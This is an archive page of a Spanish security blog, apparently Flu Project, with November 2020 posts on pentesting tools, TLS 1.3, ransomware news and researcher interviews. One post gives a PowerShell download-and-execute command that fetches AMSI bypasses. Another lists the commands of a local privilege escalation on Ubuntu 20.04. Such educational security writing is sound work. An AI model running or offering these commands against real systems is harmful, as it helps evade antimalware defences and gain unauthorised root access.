30 nov 2020

Burnout cybersecurity experts!

Buenos días lectores. 

Hace poco me llegó el típico correo que suele llegar a la bandeja de entrada y que de primeras dudas entre borrarlo o ignorarlo. De hecho, no le presté demasiada atención y lo dejé sin leer para más adelante. Sin embargo, haciendo limpieza de la bandeja de entrada y después de una conversación que había tenido ese mismo día, me llamó la atención, porque es algo a lo que no le había prestado atención nunca, pero que veo en el día a día en compañeros del sector. Los profesionales de IT y en especial los que nos dedicamos a la ciberseguridad, estamos siempre estresados. Siempre he estado acostumbrado al estrés y he considerado que "va en el sueldo" y se tiene que vivir con ello. Sin embargo el día que vi este correo por segunda vez, había hablado con un excompañero (y buen amigo) con el que hacía mucho que no hablaba. Poniéndonos al día, me dijo que un conocido (40 años pelados) había muerto de un infarto, sin ninguna enfermedad ni patología previa. Resulta que el día de la fatídica defunción, mi amigo había coincidido con él en una reunión y le había visto demasiado alterado. El pobre hombre, le comentó que llevaba una temporada muy estresado y que se iba a ir antes a casa, para pasear por el campo y relajarse, que este trabajo iba a acabar con él. Por este motivo, me he decido a hacer este post a modo concienciación para todos nosotros. 

Según un estudio de 2018 de CSO, la ciberseguridad es una de las profesiones con más estrés y en el escenario actual, cada vez más. Alguno de los datos que se recogen en su encuesta son los siguientes: 

  • El 40% de los encuestados dijo que uno de los aspectos más estresantes de una carrera en ciberseguridad es mantenerse al día con las necesidades de seguridad de las nuevas iniciativas de TI. 
  • El 39% considera que es descubrir iniciativas/proyectos de TI que fueron iniciados por otros equipos dentro de mi organización sin supervisión de seguridad (cosa que todos sabemos que nunca pasa). 
Cualquiera que se dedica a la seguridad en algún momento de su carrera
Cuando te encuentras una nueva seta...
  • El 38% considera intentar que los usuarios finales comprendan los riesgos de la ciberseguridad y que cambien su comportamiento en consecuencia. 
  • El 37% que la empresa comprenda mejor los riesgos cibernéticos. 
  • El 36% considera la creciente carga de trabajo.

Y seguramente, el 99'9 % de nosotros, alguna vez hemos sentido estrés por algún motivo de estos. Por lo que son más comunes de lo que pensamos. 

El correo de la discordia

No sé cómo será y no conozco a ninguno de los ponentes, pero después de lo vivido y visto el panorama, creo que me tomaré un ratito el día 1 de diciembre para ver el Webinar de RSA, Mental Health for hackers.

Espero que os sea de utilidad a todos. 
Un saludo

27 nov 2020

(JABBA) THE HUD: El interfaz de OWASP ZAP



Buenas a todos/as, hace mucho tiempo (bueno en verdad hace no tanto) en una galaxia de internet muy lejana (bueno vale no tan lejana) aparecía un escáner de aplicaciones web de código abierto... hoy os vengo hablar esta vez, no sólo del escáner archi conocido de OWASP ZAP, si no su interfaz para hacer análisis incluido en el navegador. Para quien no lo conozca, o sea más de utilizar por ejemplo Burp Suite, HUD es una nueva interfaz con la que interactuar mientras hacemos trabajos de auditoría o pentesting web. La interfaz de HUD ya viene integrada en las últimas versiones de ZAP, de hecho desde la versión 2.8.

¿Pero que es un "HUD"? El acrónimo corresponde a "Heads Up Display" , es decir, una pantalla de visualización, muy presente en el mundo de la realidad aumentada, y muy utilizado en los coches de alta gama, que en este caso utilizan una imagen digital transparente que se proyecta en el parabrisas de un automóvil, ofreciéndonos información que nos puede dar el ordenador de a bordo del coche. Quedémonos con esta imagen, y cambiemos el parabrisas del automóvil por nuestro navegador Firefox.

Pongamos que ahora vamos a probar ZAP con la página de pruebas de Mutillidae, por lo que iniciamos ZAP normalmente. Previamente, en las opciones de Firefox habremos puesto en las opciones de proxy la dirección de loopback, o en su defecto si tenemos la extensión FoxyProxy lo haremos más rápido aún. 



Como recordatorio para el uso de ZAP y para que nos aparezca la interfaz de HUD y para usar el escáner en general, tendremos que importar al navegador el certificado. Para ello nos vamos a Herramientas y a opciones. Dentro de las opciones nos desplazamos hasta Certificados SSL Dinámicos:

Generar certificado para importar al navegador

A partir de aquí, lo que tendríamos que hacer es guardar el certificado e importarlo a Firefox, en el apartado de certificados, y agregarlo como Autoridad certificadora en Importar, y nos quedaría de la siguiente manera:



Una vez ya hemos configurado nuestro entorno (he querido hacer todos los pasos para la gente que no esté familiarizada con los escáneres proxy web) iniciamos OWASP ZAP:

Inicio de ZAP

Este es el escáner pero ahora cuando carguemos nuestra página objetivo en el navegador nos aparecerá lo siguiente:



Con lo que ya podríamos continuar haciendo nuestra auditoría de la página en el navegador. Si nos fijamos, a los dos lados de la pantalla nos aparecerán superpuestas, las opciones típicas de ZAP, por ejemplo, podríamos hacer un escáner desde aquí o hacer un crawler de la página:







Vamos ahora a explotar una vulnerabilidad a través del proxy, para ello, en la interfaz de la izquierda vamos a activar el on en Break, para poder interceptar la petición que queramos. 




Y ahora ya podemos interceptar la petición objetivo que queremos hacer, por ejemplo, para los XSS, en Lookup DNS solo tendríamos que pulsar:


Al pulsar en Lookup DNS nos aparecerá la petición a interceptar:


Es aquí donde podemos modificar la misma, con los parámetros que mandamos para insertar el típico script/alert de XSS:








La interfaz de HUD también nos brinda todo el árbol de la web que va capturando de forma pasiva, además del típico crawling (Spider o Ajax Spider) el cual podemos lanzar también desde el mando derecho de la interfaz.



El escáner pasivo de ZAP también nos irá proporcionando vulnerabilidades, como por ejemplo, falta de cabeceras de seguridad en la aplicación (como X-Frame que protege contra ataques de clickjacking), así como pistas de potenciales vulnerabilidades.


En definitiva, una funcionalidad de ZAP en las últimas versiones muy vistosa para poder analizar una aplicación web desde la propia página para echar un primer vistazo a sus vulnerabilidades, y además muy sencillo de usar y para toda la familia. ¿Qué os parece?.


¡Saludos!

26 nov 2020

Ransomware transitivo

Muy buenas a todos, hace unos días se conoció la noticia de un ataque de ransomware a una empresa privada llamada Vastaamo, la cual gestiona muchas clínicas de psicoterapia en Finlandia. Hasta acá nada nuevo, ya que últimamente este tipo de objetivos se ha vuelto muy común. Probablemente, al no tratarse de una empresa del rubro tecnológico, los ciberdelincuentes pueden sospechar que este tipo de empresa no priorice la seguridad de su información a la hora de destinar fondos o inversiones y por supuesto ¡ha sido este el caso y los malos han confirmado su teoría!

Luego de perpetrar el ataque, afectando cerca de 40.000 registros de pacientes que se atendían en alguna de las clínicas que esta empresa gestionaba, tal y como suele ser el modus operandi en este tipo de extorsiones, los ciberdelincuentes han pedido un rescate en bitcoins equivalente a 450.000 euros a la empresa afectada a cambio de la información. 


Sigmund Freud
viendo cómo tus informes psicológicos se difunden públicamente, mientras él ya se encargaba de ofuscar datos sensibles en los expedientes de cada uno de sus pacientes en el 1900

Pero lo curioso del caso es que luego se dirigieron a algunos de los pacientes afectados indicando que, como la empresa se había negado a pagar el rescate al no asumir errores propios al descuidar la información de sus clientes, les "ofrecían" la posibilidad de eliminar sus datos personales que habían sido secuestrados para que no sean filtrados públicamente, todo eso por cifras que rondaban entre los 200 y 500 euros, incluso el monto aumentaba conforme pasara el tiempo. Podríamos decir que se trata de un caso de ransomware transitivo o al menos de uno particular, ya que el rescate es pedido al titular de la información y no a la entidad encargada de custodiarla. Seguramente que nadie quiere (o al menos a mí no me gustaría) que sus registros psicológicos sean filtrados públicamente, incluso cuando tal vez ni siquiera sabemos qué digan esos registros sobre nosotros.

Finalmente, la empresa ha reconocido que vienen sufriendo ataques desde hace tiempo y que probablemente hayan sufrido intrusiones en sus datos desde fines de 2018. Este caso ha tomado relevancia, por la magnitud del hecho, y hasta el Ministerio del Interior de Finlandia ha tomado cartas en el asunto informando, a través de la cuenta de twitter de su ministra, que desde el gobierno están brindando asesoramiento a la empresa afectada e incluso define algunas directivas hacia los pacientes cuyos registros fueron afectados.

Mi finés está algo oxidado, pero según mi amigo traductor dice algo así: ¡La piratería del Centro de Psicoterapia Vastamo es impactante! @krp_poliisi investiga el caso como presunta intrusión agravada e invasión agravada de la privacidad.

Este caso me lleva (al menos) a reflexionar sobre la información sobre nosotros que puede andar por ahí, fuera de nuestro control, y que muchas veces confiamos en entidades, empresas o personas que no tiene el cuidado que nosotros mismos tendríamos sobre ese tipo de información. Está claro que hay empresas que no se interesan por la privacidad, ya que su negocio está enfocado en otras cuestiones "más redituables importantes". 

Ya para terminar con esta reflexión, considerando la informatización a ritmos agigantados que están experimentando muchas instuticiones gubernamentales o privadas, mayoritariamente del ámbito de la salud que se han adaptado sobre la marcha debido a la situación pandémica, considero fundamental poner el foco en la seguridad de la información, ya que probablemente muchas de ellas no estén preparadas para afrontar las amenazas cibernéticas actuales y que pueden afectarnos directamente.

¡Hasta el próximo post!

25 nov 2020

TOP 15 de Amenazas de ENISA

Recientemente mi compañero Daniel escribió sobre Threat Landscape 2020 de ENISA. En esta publicación se explican las principales amenazas cyber que se han producido desde enero de 2019 hasta abril de 2020. 

Como ya se mencionó, dentro del threat landscape realmente se han generado un compendio de informes de diferentes características y públicos objetivo. Dentro de los informes de carácter más técnico, se incluye el informe con el TOP 15 de cyber amenazas, y que según el orden definido por ENISA consta de los siguientes elementos:

El primer puesto se lo lleva el malware, aunque curiosamente el ransomware, a pesar de ser un tipo de malware, tiene una categoría propia que ocupa el puesto trece de la lista. Personalmente, creo que de todos los riesgos que se han reflejado, uno de los que mayores impactos produce y que más infravalorados está por numerosas compañías de nuestro país es el Insider Threat. De hecho, raro es el mes que, tras intentar reflejar el impacto que este tipo de situaciones puede provocar a la compañía, no nos encontremos ante argumentos de muy poco peso y que desde luego no van a servir de dique de protección en caso de que el riesgo se materialice.

En sucesivos posts vamos a ir extrayendo los datos más relevantes de cada uno de los informes, uno a uno, hasta completar la colección entera. Nos vemos en el siguiente post, donde analizaremos qué se dice sobre el malware.


24 nov 2020

AMSI.Fail

 ¡Buenas a todos!

En el artículo de hoy quería enseñaros una herramienta o utilidad que llevo bastante tiempo utilizando en algunos engagements. Si bien la herramienta no hace uso de ninguna técnica nueva para hacer un bypass de AMSI, lo que si hace es generar un bypass totalmente aleatorio. De esta forma, ningún payload tendrá la misma firma que otro. Para realizar esto, el creador de la herramienta @Flangvik, ha hecho uso de una Azure Function que genera un bypass de AMSI distinto cada vez que se invoca al método a través de una petición GET al recurso.


Actualmente, AMSI.fail hace uso de cuatro tipos de bypass:

Para facilitar el uso de la herramienta, el creador ha puesto a disposición de la comunidad un dominio llamado amsi.fail que hace de interfaz web para la Azure Function en cuestión. Permitiendo así, que cualquier usuario pueda copiar el payload con mayor facilidad.


Hay que tener en cuenta, que este bypass de AMSI, se realiza sobre el proceso donde se ejecuta el payload en cuestión, y que siempre se realiza en el contexto del usuario que lo ejecuta. Por ello, y para mayor comodidad en los engagements, os dejo dos comandos de PowerShell que llaman directamente a los métodos publicados de la Azure Function y evitan tener que acceder continuamente desde el navegador a la interfaz web.

$(Invoke-WebRequest https://amsi-fail.azurewebsites.net/api/GenerateEnc).Content

IEX (New-Object Net.WebClient).DownloadString("https://amsi-fail.azurewebsites.net/api/Generate");


Si os ha gustado la herramienta no dudéis en echarle un vistazo y, añadirla a vuestro set de utilidades ;). De igual forma, os animo a que si queréis conocer en mayor detalle como funciona AMSI o la herramienta en cuestión, echéis un vistazo al repositorio donde encontraréis enlaces e información acerca de ello.

¡Saludos!

23 nov 2020

No solo de Flu vive el hacker :)

Hola lectores. 

Hoy os voy a presentar cuatro newsletters/blogs de seguridad que yo sigo de manera regular y que me parecen muy útiles para estar informado de todo lo que pueda ir pasando en el mundillo de la ciberseguirdad a nivel internacional, aunque es cierto que la mayoría de ellos, se centran en USA.


El primero es SecurityWeekly. Aunque son parte de una compañía, sus blog y sus podcasts son de muy alto nivel, tratando multitud de temáticas y siendo muy activos en redes. Actualmente han montado un canal de Discord, con el que puedes intervenir directamente con ellos, aumentando la interactividad.  Han sido galardonados durante años con distintos premios por su contenido y su actividad formativa.

El segundo es el blog de ZackWhittaker, this week in security y es uno de mis favoritos. Se encarga de recopilar todo tipo de información reciente y relevante y está conformada por distintos apartados: THIS WEEK, TL;DR, donde están las noticias de la semana en sí, THE STUFF YOU MIGHT'VE MISSED, con noticias que pasaron desapercibidas anteriormente, THE HAPPY CORNER, con temas de humor relacionados con nuestro sector y THIS WEEK'S CYBER CAT, con fotos de gatos "ciber", que ya sabéis que en internet, los gatos siempre ayudan a tener visitas. 

Sumando visitas :)

El tercer canal de noticias que suelo seguir es ISACA SmartBrief. Desde el equipo de ISACA internacional, se dedican a recopilar las noticias de ciberseguridad que han salido publicadas en prensa y las categorizan por temáticas. De esta manera, tienes un pequeño resumen semanal de lo que ha sucedido, con la posibilidad de poder ampliar con un simple golpe de ratón el contenido. No suelen ser noticias tan técnicas como las que puedes encontrar en los otros blogs, pero suelen ser muy buenas para dar datos y estadísticas cuando alguien te intenta justificar que no necesita hacer nada en ciber.   




Y por último, os voy a hablar de Bruce Schneier. Para los que no sepáis quien es, es un criptógrafo, experto en seguridad informática, y autor de diversos libros de seguridad y criptografía. En su web tiene una newsletter, en la que habla de todo tipo de noticias que recopila del sector, desde hacking a cafeteras, hasta cómo funcionan los grupos cibercriminales. Son lecturas rápidas y entretenidas muy recomendables.


Supongo que muchas de ellas ya las conoceríais, pero si os he descubierto alguna que os pueda ser de utilidad, este post habrá merecido la pena. Eso si, no nos abandonéis para comenzar a seguir a estos compañeros, que hay contenido y conocimiento para todos ;)

Nos vemos pronto. 

20 nov 2020

Burping in flavors



¡Muy buenas a todos!

Hoy quería comentarles sobre cómo agregar extensiones a la herramienta más utilizada en auditorías web. ¡Eso es! tal y como se imaginarán, estoy hablando de nuestro querido Burp. En este post haremos una guía introductoria sobre cómo instalarlas, y si bien se trata de un proceso bastante sencillo (y hasta trivial), son muchos los beneficios que puede aportarnos, ya que con las extensiones de Burp podremos ampliar aún más el potencial de esta gran aplicación para casos de uso particulares y de esta forma agilizar nuestra auditoría.

Burp cuenta con un repositorio propio de extensiones, llamado BApp Store que nos permitirá instalarlas de una forma rápida y sencilla. En él se agrupan tanto desarrollos propios del equipo de Burp como de terceros que comparten sus creaciones con el resto de la comunidad. 

Podemos acceder a todos ellos seleccionando la opción correspondiente en la pestaña Extender dentro de la herramienta. Allí se nos mostrará un listado de todas las extensiones disponibles indicando, por ejemplo, Nombre, Popoularidad, Fecha de Última Actualización y Requisitos (cabe destacar que algunas de ellas requiren la edición Burp Suite Professional). En dicha tabla podremos aplicar distintos criterios de ordenación sobre las columnas, y en el panel lateral se nos ofrecerá información más detallada como Descripción, Autor, Versión, o algún otro aspecto que el autor haya considerado importante.

Realizar la instalación de una extensión es muy fácil ya que se trata de un proceso automático, basta con seleccionarla desde el listado y utilizar el botón indicado en el panel lateral. 

Instalando una extensión desde BApp Store

Una vez finalizado el proceso, veremos que se incluye una nueva pestaña en nuestra herramienta y es desde allí que podremos indicar los parámetros o configuraciones necesarias para poder utilizar nuestra nueva extensión. Podemos también instalar extensiones de forma manual desde la pestaña Extensions, para ellos debemos indicar el lenguaje de programación utilizado para desarrollar la extensión y seleccionar el archivo correspondiente. 

Las extensiones de Burp están principalmente desarrolladas en Java, aunque también existen algunas en Python o Ruby. En caso de querer instalar una extensión desarrollada en alguno de estos últimos, debemos descargar el intérprete Java para el lenguaje correspondiente (Jython o JRuby).

Si por ejemplo queremos agregar una extensión desarrollada en Python nos encontraremos con el botón de instalación desactivado, y con un mensaje que nos indica que debemos instalar el intérprete correspondiente.

La opción de Instalar se encuentra desactiva porque no contamos con el intérprete Java para Python

Al utilizar el botón se nos abrirá un navegador con la web oficial y desde allí descargaremos la versión StandAlone y la incorporaremos en la sección Python Environment dentro de la pestaña Options.

Agregamos el intérprete Jython en su versión StandAlone

Ahora se nos habilitará la opción y podremos instalar la extensión automáticamente para comenzar a utilizarla.
 

Ahora sí podemos instalar ;-)

Finalmente mencionar que desde esta misma pestaña podemos desactivar, desinstalar o incluso definir el orden en el que nuestras pestañas de extensiones son mostradas.

Desde acá podemos administrar las extensiones instaladas

En un futuro no muy lejano les contaremos sobre algunas extensiones interesantes que pueden ayudarnos en nuestras auditorías web. 

¡Hasta el próximo post! ¡Saludos!

19 nov 2020

TLS1.3: ¿Qué hay de nuevo? (Parte II)


En este segundo post vamos a describir cómo se inician las conexiones a través de TLS1.3.

El handshake tiene una estructura diferente, y más rápida en comparación con las versiones anteriores. En este caso las etapas que se producen son:

1. El cliente genera la clave para el intercambio 

2. El cliente envía el ClientHello, en el que se encuentra la siguiente información:
2.1. Una lista de las suites de cifrado que acepta
2.2. Una lista de claves públicas para realizar el intercambio de claves.
2.3. Versiones del protocolo que acepta el cliente. 

3. El servidor genera las claves para el intercambio.

4. El servidor envía el ServerHello de vuelta, con los siguientes datos:
4.1. La suite de cifrado elegida
4.2. La clave pública elegida para el intercambio de claves
4.3. La versión del protocolo 

5. Claves del handshake del servidor. Para cifrar el resto del handshake usa:
5.1. Clave pública del cliente
5.2. Clave privada del servidor
5.3. SHA256 del ClientHello y del ServerHello

El servidor calcula la clave secreta compartida, que es calculada a partir de ambos intercambio de claves (a través del algoritmo de curva elíptica curve25519 de Diffie Hellman).

6. Claves del handshake del cliente. El cliente usa:
6.1. La clave pública del servidor.
6.2. La clave privada del cliente.
6.3. El hash del SHA256 del ClientHello y del ServerHello

El cliente calcula la clave secreta compartida (de la misma forma que el servidor en el paso anterior)

7. El servidor envía el certificado.

8. El servidor envía una verificación del certificado en la que se enlaza la clave usada en el intercambio de claves, para confirmar su integridad.

9. El servidor termina comprobando que el proceso no se ha visto alterado, de forma que realiza un hash SHA256 resultante de todos los mensajes que forman el handshake (desde el paso 2 hasta el paso 8).

10. El servidor calcula las claves que serán usadas para cifrar el tráfico durante la sesión. Para ello usa:
10.1. La clave secreta del handshake
10.2. El hash resultante del paso 9

En este paso se realizan una serie de operaciones de las que resultan las claves de la aplicación para el cliente y el servidor.

11. El cliente realiza las mismas operaciones que el servidor en el paso anterior (obteniendo, por supuesto, los mismos valores para las claves).

12. El cliente da por terminado el handshake, y realiza el hash SHA256 resultante de todos los mensajes que forman el handshake (desde el paso 2 hasta el paso 8).

13. El cliente manda el mensaje “ping” al servidor 

14. El servidor crea las claves de sesión para cifrar la conexión.

15. El servidor manda el mensaje “pong” al cliente.

De forma esquematizada, podemos visualizar este proceso en el siguiente esquema:


Para un mayor nivel de detalle del handshake, podéis consultar el siguiente enlace: https://tls13.ulfheim.net/ 

Esperamos que hayáis descubierto algunas de las curiosidades con las que ha venido esta nueva versión de TLS.

Muchos maullidos!

M


18 nov 2020

CSX-P Conquest (Time to play!)

 Buenos días lectores. 

Aunque el CSX-P es una certificación no muy conocida fuera de Estados Unidos, hoy os os traigo este post para compartir con vosotros un pequeño juego que se han currado y que no quería que os pasase desapercibido. 

Si alguien está interesado en el tema de certificaciones, aquí (1,2,3) os dejo tres posts muy interesantes que tratan del tema. Sin embargo, hoy las certificaciones no son el foco de mi artículo, sino que de lo que quería hablaros es del CSX-P Conquest

CSX-P Conquest es un pequeño juego que consiste en una serie de breves videos iniciales, sobre los que nos realizan varias cuestiones (en su mayoría técnicas). Las respuestas correctas nos permitirán ir avanzando a lo largo de los niveles que han preparado (Identify, Protect, Detect, Respond & Recovery) y se nos medirán los tiempos que tardamos en solucionar los tests. 


El juego está en inglés, por lo que puede ser una limitación para todos aquellos que no estén acostumbrados a leer en el idioma de Shakespeare, sin embargo, las preguntas, se entienden bastante bien.

Esto es una simple curiosidad que no os robará mucho tiempo, pero que me ha resultado original y divertida y puede que en algún rato libre os apetezca probar :).

Me despido por hoy, ¡espero que los lectores de Flu Project estéis en los primeros puestos del ranking! 

Suerte y nos vemos pronto.

17 nov 2020

Osi.ig: Una herramienta de OSINT para Instagram

¡Buenas!

Hoy os queremos hablar de osi.ig, una herramienta open source mediante la que obtener información de perfiles de Instagram sin necesidad de disponer una cuenta en esta red social. Mediante esta herramienta se puede obtener información de un perfil, tanto público como privado y de sus últimas imágenes publicadas, por lo que por el momento no escanea stories, reels e IGTV.


Para poder utilizar la herramienta, tan solo es necesario disponer de Python3, clonar el repositorio y dar permisos de ejecución a los scripts de instalación de la herramienta. Su uso es muy sencillo y para obtener la información básica de un perfil basta con lanzar el comando:
python3 main.py -u username
Información básica de un perfil de Instagram

Además de recuperar información básica que pueda contener el perfil (nombre de usuario, descripción, url de la página web, seguidores, seguidos, número de publicaciones, si es un perfil público o privado, si es una cuenta de negocio,  imagen del perfil, etc.) también permite conocer si la cuenta está conectada a otra de Facebook, así como un listado de los hashtags más utilizados por dicho perfil.

Las opciones disponibles para el uso de la herramienta son las siguientes:

-h, --help: muestra la ayuda.

-u USERNAME, --username USERNAME: parámetro para indicar el perfil a escanear.

-p, --post: obtiene la información de las últimas imágenes publicadas.

-s, --savedata: guarda la información extraída en un fichero.

-t, --tags: muestra un listado de las etiquetas o hashtags más utilizados.

Información de las últimas publicaciones de un perfil de Instagram

Por otra parte, en las diferentes pruebas que se han realizado recuperando el listado con la información de las últimas publicaciones mediante la opción -p, los datos recuperados se corresponden con los propios de las fotografías publicadas (fecha, descripción, número de comentarios y likes, ubicación, enlace acortado a la imagen y una descripción de accesibilidad). En este sentido, se ha comprobado que el apartado referente a la ubicación recupera la localización con la que se ha etiquetado la publicación. Esto se debe a que Instagram permite etiquetar las publicaciones con una ubicación, que no tiene por qué corresponderse con la localización real o actual desde la que publica el perfil, por lo que no estaría recuperando un metadato de la imagen publicada sino información que estaría visible en la propia publicación.

Esperamos que esta herramientas os sirva de utilidad.

¡¡Saludos y hasta el próximo post!!

16 nov 2020

Me siento privilegiado con mi Ubuntu 20.04

Muy buenas a todos! Hoy queremos hablarles sobre escalada de privilegios, en particular sobre el sistema operativo Ubuntu 20.04, su versión LTS más reciente, lanzada a comienzos de este año. Hace algunos días el investigador de seguridad de GitHub, Kevin Backhouse, ha publicado un artículo en el cual informa que ha descubierto una manera muy sencilla de obtener una cuenta con permisos root a partir de un usuario sin privilegios.

Podríamos pensar que para poder elevar privilegios en un sistema operativo tan moderno necesitaríamos un exploit con varias líneas de código, pero sorprendentemente para llevar a cabo el proceso sólo se hace uso del entorno gráfico, unos pocos comandos, una denegación de servicio y mucho ingenio.

Según explica el investigador, utilizando la terminal desde un usuario sin privilegios se crea un enlace simbólico en su propio home llamado .pam_environment que apunta a /dev/zero

$ ln -s /dev/zero .pam_environment

Posteriormente se debe ingresar a las opciones de Configuración Regional e Idioma para cambiar el lenguaje del sistema.

Seleccionamos una nueva configuración de idioma

En ese momento se generará una Denegación de Servicio en account-daemon y este será el inicio del ataque. Analizando la salida de top podemos corroborar que el servicio comienza a consumir una gran cantidad de recursos del sistema.  

Captura comando top. Notar el elevado uso de CPU

Luego, eliminaremos el enlace simbólico creado anteriormente y detendremos el proceso correspondiente enviando la señal de SIGSTOP (podemos obtener el PID en cuestión desde la salida de top o de pidof ).

$ rm .pam_environment

$ kill -SIGSTOP <PID> 

Ahora es cuando hacemos la fantasía y prepararemos el terreno para luego cerrar la sesión. Lo primero que haremos es indicar una secuencia de comandos dentro de una shell. Entre los comandos debemos definir un timer que al finalizar dará lugar a la ejecución del comando kill con la señal SIGSEGV y luego nuevamente kill pero esta vez con la señal SIGCONT, ambos sobre el proceso en cuestión. Como todo esto queremos que se realice mientras estamos cerrando la sesión, haremos uso del comando nohup. Es importante que el tiempo definido sea suficiente para que nos permita completar el proceso para cerrar la sesión actual.

$ nohup bash -c "sleep 30s; kill -SIGSEGV <PID>; kill -SIGCONT <PID>"

Con esto estaremos mezclando los componentes para generar una especie de comando bomba que debemos plantar para que "explote" mientras cerramos la sesión.

Plantando la bomba

Una vez completado el proceso de cierre de sesión, y si todo sale bien, luego de unos segundos se nos presentará un asistente, con varios cuadros de diálogo, como el que debemos completar luego de instalar el Sistema Operativo y dentro del cual tendremos que crear un usuario.

Creamos un nuevo usuario mediante el asistente

Al completar el asistente se iniciará sesión para este usuario creado, la particularidad que tiene dicho nuevo usuario es que pertenecerá al grupo sudo y por lo tanto tendremos privilegios de administración.

Grupos a los que pertenece el usuario creado

Este método se aprovecha de dos bugs recientemente reportados que involucran al servicio de manejo de cuentas de usuario (accountsservice) y al servicio que maneja la pantalla de login (gdm3). En el primer caso los CVE involucrados son CVE-2020-16126 y CVE-2020-16127, mientras que en el segundo hacemos uso de CVE-2020-16125. Según reconoce el autor en su artículo, descubrió el proceso de forma casi accidental, lo que hace la historia aún más curiosa...

A escalar privilegios y hasta el próximo post!


13 nov 2020

#FluConLaCiencia: Rafael Luque, Profesor e Investigador en la Universidad de Córdoba

¡Buenas a todos! Con el artículo de hoy finalizamos la Semana de la Ciencia en Flu Project. Esperamos que haya sido de vuestro interés, y que, de todo corazón, hayamos podido acercaros un poco más a la investigación pública de nuestro país. Tenemos grandes profesionales que realizan trabajos excepcionales con recursos muy limitados, lo que sin duda merece todo nuestro apoyo y respeto. Para concluir, os traemos una entrevista especial. Tenemos el placer de tener con nosotros a Rafael Luque, uno de los grandes referentes de nuestro país, que nos hablará sobre su interesante carrera a nivel internacional. Todo un ejemplo para todos.

Juan Antonio Calles


Rafael Luque es licenciado por la Universidad de Córdoba (UCO) en 2001, doctor por la Universidad de Córdoba (2005) y actualmente Profesor Titular de Universidad del Departamento de Química Orgánica de la Universidad de Córdoba, donde retornó tras una estancia postdoctoral de tres años en la Universidad de York.

Con sus más de 550 publicaciones en revistas científicas de revisión por pares (índice h= 79; >29,000 citas, índice de impacto promedio de publicaciones de 7,0), 5 patentes en explotación, >10 libros editados, múltiples capítulos de libro y charlas invitadas en congresos internacionales en USA, Brasil, Hong Kong, Francia, Alemania, etc. Rafael es uno de los líderes científicos a nivel internacional de la investigación en el campo de la química sostenible, valorización de biomasa y residuos utilizando catálisis heterogénea. Rafael también es asimismo experto evaluador de la ANEP, de la Unión Europea (Programa FP7, Horizon2020, BBI y ERC Starting, Consolidator y Advanced Grants) así como de múltiples agencias internacionales de Reino Unido, Polonia, República Checa, Francia, Italia, Kazajistan, etc. Desde Enero de 2018, el Dr. Luque es Editor-in-chief de la revista Molecular Catalysis (Elsevier, i.f. 3.7) y desde 2015 Editor-in-Chief de la sección Porous Materials de la revista Materials (MDPI, i.f. 2.4), formando parte del Editorial Board y/o Advisory Board de prestigiosas revistas entre las que se incluyen Chemical Society Reviews (i.f. 40) y Green Chemistry (i.f. 9,5) de la Royal Society of Chemistry, ACS Sustainable Chemistry & Engineering (i.f. 7,6) de la ACS, ChemCatChem (i.f. 4,7) de Wiley, Scientific Reports (Springer/Nature, i.f. 3,5) y Topics in Current Chemistry (Springer, i.f. 5,5) y Catalysis Communications (Elsevier, i.f. 3,0), entre otras. Las investigaciones desarrolladas por el Dr. Luque en los últimos años han sido ampliamente premiadas a nivel internacional con numerosos reconocimientos entre los que se incluyen el Premio Marie Curie Prize de Jóvenes Investigadores del Instituto Andaluz de Química Fina (2011), el premio Green Talents 2011 del Ministerio Federal de Educación e Investigación de Alemania, el TR 35 Spain concedido por Technology Reviews y MIT como uno de los top 10 emprendedores de España en 2012, el prestigioso RSC Environment, Sustainability and Energy Early Career Award (2013) concedido por la RSC UK, la 2015 Lu Jiaxi lectureship del College of Chemistry and Engineering in Xiamen University (China) y la 2018 ACS Sustainable Chemistry & Engineering Lectureship award de la American Chemical Society. Asimismo, el Dr. Luque fue nombrado 2013 Distinguished Engineering Fellow del CBME en Hong Kong University of Science and Technology (Hong Kong) y actualmente es Visiting Professor de la Chinese Academy of Sciences en el State Key Laboratory of Electroanalytical Chemistry, Changchun Institute of Applied Chemistry (desde 2014) y Visiting Professor en Xiamen University (China, desde 2015) así como Ciencia Sem Fronteiras Pesquisador Especial en la Universidade Federal de Pelotas in Brazil (2015 2018). 

Desde primeros de 2018, el Dr. Luque es el Director del Scientific Center for Molecular Design and Synthesis of innovative Compounds for the Medical Industry de la RUDN University en Moscú, Rusia, siendo también Distinguished Chair Professor de la Xi´an Juaotong University en China (desde 2019) así como DFSP Distinguished Fellow del Departamento de Química de la King Saud University en Arabia Saudí. 

El Dr. Luque es asimismo co-fundador de las empresas Starbon Technologies Ltd. en York, Reino Unido en 2011, y la empresa Green Applied Solutions S.L

El Prof. Luque está presente en el listado de 2018, 2019 y 2020 Highly Cited Researchers (Clarivate Analytics) como uno de los 6,000 científicos más citados del mundo y único investigador de toda la universidad de Córdoba, con sus investigaciones citadas en el top 1% de sus áreas de conocimiento, un reconocimiento a la trayectoria científica entre los años 2006 a 2019.  

La investigación en España pasa por momentos críticos en la actualidad, necesitando una fuerte inversión en infraestructura y sobre todo en personal para los próximos años. La clase política aún no es consciente del papel de la ciencia y de la investigación en resolver los problemas del presente para un mejor futuro, ¡comenzando por el problema actual del coronavirus! En España hacemos una ciencia de excelencia prácticamente sin recursos, y sacamos petróleo de lo poco que tenemos… Me atrevería a decir que muchas de las actuales infraestructuras, y sobre todo el poco personal cualificado que va quedando en el país (debido a un éxodo masivo de científicos al extranjero por falta de oportunidades) no tienen nada que envidiar a lo existente en países como Estados Unidos, Suiza o Japón, y países emergentes como China.

Apoyemos y concienciemos a los que nos gobiernan para una fuerte inversión en ciencia para un mejor futuro! #sinciencianohayfuturo

Rafael Luque

Actualización del 13/11/2020

Desde Flu Project queremos mandar un cálido abrazo a Rafael y desearle una pronta recuperación.

12 nov 2020

#FluConLaCiencia: Juana Morillas Ruiz, Profesora e Investigadora en el Departamento de Tecnología de la Alimentación y Nutrición de la UCAM

¡Hola a los fieles seguidores de Flu-Project!

Me llena de orgullo y satisfacción (¡….!), y va en serio que, a través de este post, con motivo de la Semana de la Ciencia y la Investigación, pueda resumir mi experiencia como investigadora científica y con ello tener voz para manifestar que, sin el apoyo a la ciencia no hay sociedad que pueda progresar adecuadamente.

Mi nombre es Juana María Morillas Ruiz, soy doctora en Farmacia y trabajo desde hace más de 23 años como docente investigadora en la Universidad Católica San Antonio de Murcia (UCAM). 

